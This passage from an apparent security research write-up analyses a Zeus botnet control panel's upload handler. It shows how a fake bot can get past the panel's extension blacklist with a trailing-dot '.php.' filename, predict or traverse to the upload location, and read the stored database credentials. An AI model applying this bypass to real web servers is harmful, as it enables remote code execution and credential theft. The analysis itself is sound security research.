    $k = @unpack('L4', @substr($data, $i, ITEM_HEADER_SIZE));
    $list[$k[1]] = @substr($data, $i + ITEM_HEADER_SIZE, $k[3]);
    $i += (ITEM_HEADER_SIZE + $k[3]);
}

Once the data is unpacked, we will have an array ($list[]) populated with various configuration and log data being passed from the bot to the C&C.  Using what we’ve discovered thus far, we can create a fake bot that is capable of communicating with the C&C.  Depending on the values held in the $list array, the gateway executes various functions.  One of the functions I found interesting was this:

else if(!empty($list[SBCID_BOTLOG]) && !empty($list[SBCID_BOTLOG_TYPE]))
{
    $type = ToInt($list[SBCID_BOTLOG_TYPE]);

    if($type == BLT_FILE)
    {
        // Extensions that allow remote execution.
        $bad_exts = array('.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml');

        $fd_hash  = 0;
        $fd_size  = strlen($list[SBCID_BOTLOG]);

        // Build the file name.
        if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();
        $file_root = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);
        $file_path = $file_root;
        $last_name = '';

        $l = explode('/', (isset($list[SBCID_PATH_DEST]) && strlen($list[SBCID_PATH_DEST]) > 0 ? str_replace('\\', '/', $list[SBCID_PATH_DEST]) : 'unknown'));
        foreach($l as &$k)
        {
            $file_path .= '/'.($last_name = urlencode($k));
        }
        if(strlen($last_name) === 0)$file_path .= '/unknown.dat';

        // Check the extension, and set the file mask.
        if(($ext = strrchr($last_name, '.')) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat';
        $ext_pos = strrpos($file_path, '.');

        // FIXME: If the name is too long.
        if(strlen($file_path) > 180)$file_path = $file_root.'/longname.dat';

        // Add the file.
        for($i = 0; $i < 9999; $i++)
        {
            if($i == 0)$f = $file_path;
            else $f = substr_replace($file_path, '('.$i.').', $ext_pos, 1);

            if($fd_size == filesize($f))
            {
                if($fd_hash === 0)$fd_hash = md5($list[SBCID_BOTLOG], true);
                if(strcmp(md5_file($f, true), $fd_hash) === 0)break;
            }
        }

        if(!CreateDir(dirname($file_path)) || !($h = fopen($f, 'wb')))die();
        flock($h, LOCK_EX);
        fwrite($h, $list[SBCID_BOTLOG]);
        flock($h, LOCK_UN);
    }
}


A quick look at the function above shows that if $list[SBCID_BOTLOG] and $list[SBCID_BOTLOG_TYPE] are set to the correct values, we can trick the C&C into thinking we have a bot that needs to upload a logfile.  Before the C&C accepts our supplied logfile, it first attempts some validation: it checks whether the file extension we’re providing is on a blacklist of “bad extensions” and whether the supplied filepath trips IsHackNameForPath() (a custom validation routine written by the C&C author).

$bad_exts = array('.php3', '.php4', '.php5', '.php', '.asp', '.aspx', '.exe', '.pl', '.cgi', '.cmd', '.bat', '.phtml');


if(($ext = strrchr($last_name, '.')) === false || in_array(strtolower($ext), $bad_exts) !== false)$file_path .= '.dat';


// Build the file name.
if(IsHackNameForPath($bot_id) || IsHackNameForPath($botnet))die();
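
Mirroring the extension check in Python makes the weakness easy to probe.  A sketch: stored_name() and the sample filenames are mine, but the logic follows the strrchr()/in_array() lines above.

```python
# Same blacklist as the C&C's $bad_exts array.
BAD_EXTS = {".php3", ".php4", ".php5", ".php", ".asp", ".aspx",
            ".exe", ".pl", ".cgi", ".cmd", ".bat", ".phtml"}

def stored_name(last_name: str) -> str:
    """Mirror of gate.php's check: take everything from the last '.'
    (like strrchr), and append '.dat' if the extension is blacklisted
    or missing."""
    dot = last_name.rfind(".")
    ext = last_name[dot:] if dot != -1 else None
    if ext is None or ext.lower() in BAD_EXTS:
        return last_name + ".dat"
    return last_name

print(stored_name("pwnd.php"))   # 'pwnd.php.dat' -- neutralized
# A name ending in a bare dot has an "extension" of just '.', which
# isn't on the blacklist, so the name survives untouched.
print(stored_name("pwnd.php."))  # 'pwnd.php.'
```

That surviving “.php.” name is the gap: the blacklist never matches, yet the web server can still hand the file to the PHP interpreter.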

We know the web server supports PHP because the C&C web management console is written in PHP.  If we can pretend to be a bot, convince the C&C that we have a “BOTLOG” that needs to be uploaded, and instead upload a PHP file with our own PHP content, we could have arbitrary code execution on the C&C.  It seems the C&C code protects against this attack… or does it?  Unfortunately for the botmaster, the PHP interpreter is very liberal about extensions.  Some examples of the quirky extension madness associated with PHP can be found on slide 23 of this presentation (given by Kuza55 at CCC 2007).  In this case, I want to upload a PHP file to both IIS and Apache (the supported platforms for the C&C), so I use the trailing dot trick.  All I have to do is append a trailing period to the end of the .php extension (.php.), and I can bypass the extension check yet still have the file contents run by the PHP interpreter.  Once the extension check is bypassed, the value I supplied for $list[SBCID_BOTLOG] is written as the content of the file I specified on the webserver.  Now I just have to guess where my PHP file was written.  This line of PHP in the gateway source gives us a clue.

$file_root = REPORTS_PATH.'/files/'.urlencode($botnet).'/'.urlencode($bot_id);

The default location for the BOT LOG is: C&C-webroot\_reports\files\<Name of the botnet>\<Bot ID>\

I also control (via values passed from my fake bot to the C&C) the two subdirectory names (in this example: “BKs_BOTNET” for <Name of the botnet> and “BK_PWNZ_UR_CnC” for <Bot ID>).  If the botmaster is using a default install and hasn’t relocated the _reports folder, we should be able to simply guess where our PHP file was written to (/_reports/files/BKs_BOTNET/BK_PWNZ_UR_CnC/pwnd.php).
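
Predicting the final URL is then just string assembly.  A sketch: the _reports prefix matches the default install, the names are my examples, and PHP’s urlencode() behaves like Python’s quote_plus for these inputs:

```python
from urllib.parse import quote_plus

def report_path(botnet: str, bot_id: str, filename: str) -> str:
    """Mirror of REPORTS_PATH.'/files/'.urlencode($botnet).'/'
    .urlencode($bot_id) under a default install."""
    return "/_reports/files/%s/%s/%s" % (
        quote_plus(botnet), quote_plus(bot_id), filename)

print(report_path("BKs_BOTNET", "BK_PWNZ_UR_CnC", "pwnd.php."))
# '/_reports/files/BKs_BOTNET/BK_PWNZ_UR_CnC/pwnd.php.'
```

Since both directory names are values our fake bot sends, the only real unknown on a default install is the webroot itself.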

If the botmaster was smart and relocated the _reports folder, guessing where the uploaded PHP file landed becomes more difficult.  We can take all the guesswork out by using some directory traversal tricks and planting the PHP file directly in the webroot.

Boom… we’ve just taken over a Zeus C&C.  Once we have our own PHP code running on the C&C, we can include the /system/config.php file.  Config.php contains the location of the MySQL database as well as the DB username and password (via connection string), giving us complete control over the management console and all the bots associated with this C&C.

For those interested in “studying” this vulnerability, I’ve put together a Proof of Concept.  All you have to do is provide the location of the gateway (provided by the bot), the RC4 key (provided by the bot), and the PHP code that you want to upload.
